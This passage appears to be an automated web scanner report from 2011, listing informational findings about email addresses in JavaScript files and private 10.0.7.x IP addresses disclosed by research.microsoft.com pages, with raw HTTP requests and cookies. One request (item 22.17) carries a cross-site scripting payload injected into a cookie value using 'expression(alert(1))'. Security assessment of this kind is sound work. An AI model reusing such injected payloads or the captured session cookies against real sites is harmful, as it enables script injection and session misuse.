Host:	https://www.sslmatrix.com
Path:	/script/jquery.jqGrid.min.js

Issue detail

The following email address was disclosed in the response:

tony@trirand.com

Request

GET /script/jquery.jqGrid.min.js HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Jul 2011 18:51:57 GMT
Accept-Ranges: bytes
ETag: "9a1d3a737b3acc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:32:15 GMT
Content-Length: 226567

/*
* jqGrid 3.8 - jQuery Grid
* Copyright (c) 2008, Tony Tomov, tony@trirand.com
* Dual licensed under the MIT and GPL licenses
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl-2.0.html
* Date:2010-09-21
* Modules: grid.base.js; jque
...[SNIP]...

21.123. https://www.sslmatrix.com/script/jquery_menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/script/jquery_menu.js

Issue detail

The following email address was disclosed in the response:

i.finchuk@gmail.com

Request

GET /script/jquery_menu.js HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Jul 2011 18:52:05 GMT
Accept-Ranges: bytes
ETag: "33ed1777b3acc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:32:17 GMT
Content-Length: 4391

/**
* Menu - plugin for creating DHTML menus
*
* Author:    Igor Finchuk
*            i.finchuk@gmail.com
*
* Version: 0.07 (08/03/2008)
*
* + select fixes with iframe
*
* Requires: jQuery 1.1+
*/
(function($){

   var Menu = function( el, settings ){

       var $menu = $(el);
       var $cont
...[SNIP]...

21.124. http://www.vasco.com/js/rotating_banner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vasco.com
Path:	/js/rotating_banner.js

Issue detail

The following email address was disclosed in the response:

landofcoder@gmail.com

Request

GET /js/rotating_banner.js HTTP/1.1
Host: www.vasco.com
Proxy-Connection: keep-alive
Referer: http://www.vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Date: Sat, 03 Sep 2011 21:24:41 GMT
Content-Length: 21176
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Aug 2011 12:47:10 GMT
Accept-Ranges: bytes
ETag: "09bb049c955cc1:253d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

// JavaScript Document
/*! Copyright (c) 2009 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.open
...[SNIP]...
<@emai:landofcoder@gmail.com>
...[SNIP]...

22. Private IP addresses disclosed previous next
There are 259 instances of this issue:

http://research.microsoft.com/Search
http://research.microsoft.com/apps/dp/areas.aspx
http://research.microsoft.com/apps/dp/blank.jpg
http://research.microsoft.com/apps/dp/dl/downloads.aspx
http://research.microsoft.com/apps/dp/downloads.aspx
http://research.microsoft.com/apps/dp/ev/events.aspx
http://research.microsoft.com/apps/dp/gr/groups.aspx
http://research.microsoft.com/apps/dp/groups.aspx
http://research.microsoft.com/apps/dp/i/reverse_
http://research.microsoft.com/apps/dp/ne/news.aspx
http://research.microsoft.com/apps/dp/news.aspx
http://research.microsoft.com/apps/dp/pe/people.aspx
http://research.microsoft.com/apps/dp/pr/projects.aspx
http://research.microsoft.com/apps/dp/projects.aspx
http://research.microsoft.com/apps/dp/pu/publications.aspx
http://research.microsoft.com/apps/dp/search.aspx
http://research.microsoft.com/apps/dp/search.aspx
http://research.microsoft.com/apps/dp/vi/videos.aspx
http://research.microsoft.com/apps/pubs/default.aspx
http://research.microsoft.com/apps/pubs/default.aspx
http://research.microsoft.com/apps/search/videosearch.ashx
http://research.microsoft.com/apps/video/default.aspx
http://research.microsoft.com/apps/video/default.aspx
http://research.microsoft.com/en-us/about/awards.aspx
http://research.microsoft.com/en-us/about/brochure-1.aspx
http://research.microsoft.com/en-us/about/brochure-2.aspx
http://research.microsoft.com/en-us/about/brochure-3.aspx
http://research.microsoft.com/en-us/about/brochure-4.aspx
http://research.microsoft.com/en-us/about/brochure-5.aspx
http://research.microsoft.com/en-us/about/brochure-6.aspx
http://research.microsoft.com/en-us/about/brochure-7.aspx
http://research.microsoft.com/en-us/about/brochure-8.aspx
http://research.microsoft.com/en-us/about/brochure-9.aspx
http://research.microsoft.com/en-us/about/contactus.aspx
http://research.microsoft.com/en-us/about/default.aspx
http://research.microsoft.com/en-us/about/directors.aspx
http://research.microsoft.com/en-us/about/feature/downloads.aspx
http://research.microsoft.com/en-us/about/paperawards.aspx
http://research.microsoft.com/en-us/collaboration/about/default.aspx
http://research.microsoft.com/en-us/collaboration/about/events.aspx
http://research.microsoft.com/en-us/collaboration/about/projects.aspx
http://research.microsoft.com/en-us/collaboration/about/summits.aspx
http://research.microsoft.com/en-us/collaboration/awards/default.aspx
http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx
http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx
http://research.microsoft.com/en-us/collaboration/bg_txt.png
http://research.microsoft.com/en-us/collaboration/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx
http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx
http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx
http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx
http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/india/default.aspx
http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx
http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx
http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx
http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
http://research.microsoft.com/en-us/collaboration/institutes/default.aspx
http://research.microsoft.com/en-us/collaboration/tools/default.aspx
http://research.microsoft.com/en-us/community/default.aspx
http://research.microsoft.com/en-us/default.aspx
http://research.microsoft.com/en-us/default.aspx
http://research.microsoft.com/en-us/events/escience2011/
http://research.microsoft.com/en-us/events/indiaschooljune2011/
http://research.microsoft.com/en-us/events/women-in-computing2011/
http://research.microsoft.com/en-us/jobs/default.aspx
http://research.microsoft.com/en-us/jobs/default.aspx
http://research.microsoft.com/en-us/jobs/fulltime/default.aspx
http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx
http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx
http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx
http://research.microsoft.com/en-us/jobs/intern/about_india.aspx
http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx
http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx
http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
http://research.microsoft.com/en-us/jobs/intern/default.aspx
http://research.microsoft.com/en-us/jobs/intern/russia.aspx
http://research.microsoft.com/en-us/labs/asia/default.aspx
http://research.microsoft.com/en-us/labs/cambridge/default.aspx
http://research.microsoft.com/en-us/labs/cmic/default.aspx
http://research.microsoft.com/en-us/labs/default.aspx
http://research.microsoft.com/en-us/labs/emic/default.aspx
http://research.microsoft.com/en-us/labs/fuse/default.aspx
http://research.microsoft.com/en-us/labs/ilabs/default.aspx
http://research.microsoft.com/en-us/labs/india/default.aspx
http://research.microsoft.com/en-us/labs/newengland/
http://research.microsoft.com/en-us/labs/newengland/default.aspx
http://research.microsoft.com/en-us/labs/redmond/default.aspx
http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx
http://research.microsoft.com/en-us/labs/xcg/default.aspx
http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
http://research.microsoft.com/en-us/news/features/interns-080309.aspx
http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx
http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
http://research.microsoft.com/en-us/people/abadi/default.aspx
http://research.microsoft.com/en-us/people/adiamant/default.aspx
http://research.microsoft.com/en-us/people/ajbrush/default.aspx
http://research.microsoft.com/en-us/people/akashl/
http://research.microsoft.com/en-us/people/alecw/
http://research.microsoft.com/en-us/people/alexac/default.aspx
http://research.microsoft.com/en-us/people/aphillip/
http://research.microsoft.com/en-us/people/aproutie/
http://research.microsoft.com/en-us/people/aratan/default.aspx
http://research.microsoft.com/en-us/people/asellen/
http://research.microsoft.com/en-us/people/asellen/default.aspx
http://research.microsoft.com/en-us/people/bainguo/default.aspx
http://research.microsoft.com/en-us/people/bibuxton/default.aspx
http://research.microsoft.com/en-us/people/birrell/default.aspx
http://research.microsoft.com/en-us/people/blinn/default.aspx
http://research.microsoft.com/en-us/people/bycook/default.aspx
http://research.microsoft.com/en-us/people/cthacker/default.aspx
http://research.microsoft.com/en-us/people/dburger/
http://research.microsoft.com/en-us/people/dburger/default.aspx
http://research.microsoft.com/en-us/people/deng/default.aspx
http://research.microsoft.com/en-us/people/dmb/
http://research.microsoft.com/en-us/people/dmb/default.aspx
http://research.microsoft.com/en-us/people/dwork/
http://research.microsoft.com/en-us/people/gbell/default.aspx
http://research.microsoft.com/en-us/people/ggr/default.aspx
http://research.microsoft.com/en-us/people/goldberg/default.aspx
http://research.microsoft.com/en-us/people/grama/default.aspx
http://research.microsoft.com/en-us/people/gray/
http://research.microsoft.com/en-us/people/gray/default.aspx
http://research.microsoft.com/en-us/people/hon/default.aspx
http://research.microsoft.com/en-us/people/horvitz/default.aspx
http://research.microsoft.com/en-us/people/hsalama/default.aspx
http://research.microsoft.com/en-us/people/hshum/default.aspx
http://research.microsoft.com/en-us/people/indranim/
http://research.microsoft.com/en-us/people/jamiesho/
http://research.microsoft.com/en-us/people/jbishop/default.aspx
http://research.microsoft.com/en-us/people/jiansun/default.aspx
http://research.microsoft.com/en-us/people/johndo/default.aspx
http://research.microsoft.com/en-us/people/jplatt/default.aspx
http://research.microsoft.com/en-us/people/jtw/default.aspx
http://research.microsoft.com/en-us/people/krw/default.aspx
http://research.microsoft.com/en-us/people/kstrauss/
http://research.microsoft.com/en-us/people/larus/default.aspx
http://research.microsoft.com/en-us/people/lilich/
http://research.microsoft.com/en-us/people/lilich/default.aspx
http://research.microsoft.com/en-us/people/lintaoz/default.aspx
http://research.microsoft.com/en-us/people/liuj/default.aspx
http://research.microsoft.com/en-us/people/lomet/default.aspx
http://research.microsoft.com/en-us/people/luca/default.aspx
http://research.microsoft.com/en-us/people/malvar/
http://research.microsoft.com/en-us/people/malvar/default.aspx
http://research.microsoft.com/en-us/people/manuelc/default.aspx
http://research.microsoft.com/en-us/people/marycz/default.aspx
http://research.microsoft.com/en-us/people/mds/
http://research.microsoft.com/en-us/people/mds/default.aspx
http://research.microsoft.com/en-us/people/milanv/
http://research.microsoft.com/en-us/people/milanv/default.aspx
http://research.microsoft.com/en-us/people/mzh/
http://research.microsoft.com/en-us/people/najork/default.aspx
http://research.microsoft.com/en-us/people/pachou/default.aspx
http://research.microsoft.com/en-us/people/padmanab/default.aspx
http://research.microsoft.com/en-us/people/palarson/default.aspx
http://research.microsoft.com/en-us/people/parno/
http://research.microsoft.com/en-us/people/philbe/
http://research.microsoft.com/en-us/people/philbe/default.aspx
http://research.microsoft.com/en-us/people/ramjee/
http://research.microsoft.com/en-us/people/ranveer/default.aspx
http://research.microsoft.com/en-us/people/rashid/default.aspx
http://research.microsoft.com/en-us/people/richdr/default.aspx
http://research.microsoft.com/en-us/people/robertson/default.aspx
http://research.microsoft.com/en-us/people/roylevin/
http://research.microsoft.com/en-us/people/sdumais/default.aspx
http://research.microsoft.com/en-us/people/shuvendu/default.aspx
http://research.microsoft.com/en-us/people/simonpj/
http://research.microsoft.com/en-us/people/simonpj/default.aspx
http://research.microsoft.com/en-us/people/spli/
http://research.microsoft.com/en-us/people/surajitc/
http://research.microsoft.com/en-us/people/surajitc/default.aspx
http://research.microsoft.com/en-us/people/terry/default.aspx
http://research.microsoft.com/en-us/people/thekkath/default.aspx
http://research.microsoft.com/en-us/people/thoare/
http://research.microsoft.com/en-us/people/thoare/default.aspx
http://research.microsoft.com/en-us/people/tonyhey/default.aspx
http://research.microsoft.com/en-us/people/tsharp/
http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx
http://research.microsoft.com/en-us/people/wobber/default.aspx
http://research.microsoft.com/en-us/people/wong/default.aspx
http://research.microsoft.com/en-us/people/wyma/
http://research.microsoft.com/en-us/people/zhao/default.aspx
http://research.microsoft.com/en-us/press/ablake.aspx
http://research.microsoft.com/en-us/press/anandan.aspx
http://research.microsoft.com/en-us/press/bainguo.aspx
http://research.microsoft.com/en-us/press/borgs.aspx
http://research.microsoft.com/en-us/press/cmbishop.aspx
http://research.microsoft.com/en-us/press/default.aspx
http://research.microsoft.com/en-us/press/fastfacts.aspx
http://research.microsoft.com/en-us/press/hon.aspx
http://research.microsoft.com/en-us/press/jchayes.aspx
http://research.microsoft.com/en-us/press/kevinsch.aspx
http://research.microsoft.com/en-us/press/kwood.aspx
http://research.microsoft.com/en-us/press/malvar.aspx
http://research.microsoft.com/en-us/press/mds.aspx
http://research.microsoft.com/en-us/press/overview.aspx
http://research.microsoft.com/en-us/press/rajamani.aspx
http://research.microsoft.com/en-us/press/roylevin.aspx
http://research.microsoft.com/en-us/press/telabbady.aspx
http://research.microsoft.com/en-us/projects/chem4word/default.aspx
http://research.microsoft.com/en-us/projects/creativecommons/default.aspx
http://research.microsoft.com/en-us/projects/csec/
http://research.microsoft.com/en-us/projects/nodexl/
http://research.microsoft.com/en-us/projects/researchgames/
http://research.microsoft.com/en-us/projects/serviceos/
http://research.microsoft.com/en-us/projects/wwt/contest.aspx
http://research.microsoft.com/en-us/projects/wwt/default.aspx
http://research.microsoft.com/en-us/research/default.aspx
http://research.microsoft.com/en-us/um/people/awf/
http://research.microsoft.com/en-us/um/people/bahl/
http://research.microsoft.com/en-us/um/people/borgs/
http://research.microsoft.com/en-us/um/people/jchayes/
http://research.microsoft.com/en-us/um/people/szeliski/
http://research.microsoft.com/en-us/um/redmond/about/timeline/
http://research.microsoft.com/feedGen/
http://research.microsoft.com/nothing.html
http://static.ak.facebook.com/connect/canvas_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/FGFbc80dUKj.png
http://www.facebook.com/connect/uiserver.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.register.com/
http://www.register.com/domain/searchresults.rcmx
http://www.register.com/unauthenticated_session_expired.rcmx
http://www.register.com/unauthenticated_session_expired.rcmx

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://research.microsoft.com/Search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/Search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.2. http://research.microsoft.com/apps/dp/areas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/areas.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/dp/areas.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.3. http://research.microsoft.com/apps/dp/blank.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/blank.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.4. http://research.microsoft.com/apps/dp/dl/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/dl/downloads.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.5. http://research.microsoft.com/apps/dp/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/downloads.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/downloads.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.6. http://research.microsoft.com/apps/dp/ev/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/ev/events.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/ev/events.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.7. http://research.microsoft.com/apps/dp/gr/groups.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/gr/groups.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.8. http://research.microsoft.com/apps/dp/groups.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/groups.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/dp/groups.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.9. http://research.microsoft.com/apps/dp/i/reverse_ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/i/reverse_

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/i/reverse_ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.10. http://research.microsoft.com/apps/dp/ne/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/ne/news.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/ne/news.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.11. http://research.microsoft.com/apps/dp/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/news.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/news.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.12. http://research.microsoft.com/apps/dp/pe/people.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pe/people.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/pe/people.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.13. http://research.microsoft.com/apps/dp/pr/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pr/projects.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.14. http://research.microsoft.com/apps/dp/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/projects.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/dp/projects.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.15. http://research.microsoft.com/apps/dp/pu/publications.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/pu/publications.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/dp/pu/publications.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.16. http://research.microsoft.com/apps/dp/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/search.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.17. http://research.microsoft.com/apps/dp/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/search.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/dp/search.aspx?q=xss&x=0&y=0 HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520-%252520Turning%252520Ideas%252520into%252520Reality%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/a/i/c/search_s.gif%2526ot%253DIMAGE

Response

22.18. http://research.microsoft.com/apps/dp/vi/videos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/vi/videos.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.19. http://research.microsoft.com/apps/pubs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/pubs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /apps/pubs/default.aspx?id=136976 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.20. http://research.microsoft.com/apps/pubs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/pubs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /apps/pubs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.21. http://research.microsoft.com/apps/search/videosearch.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/search/videosearch.ashx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

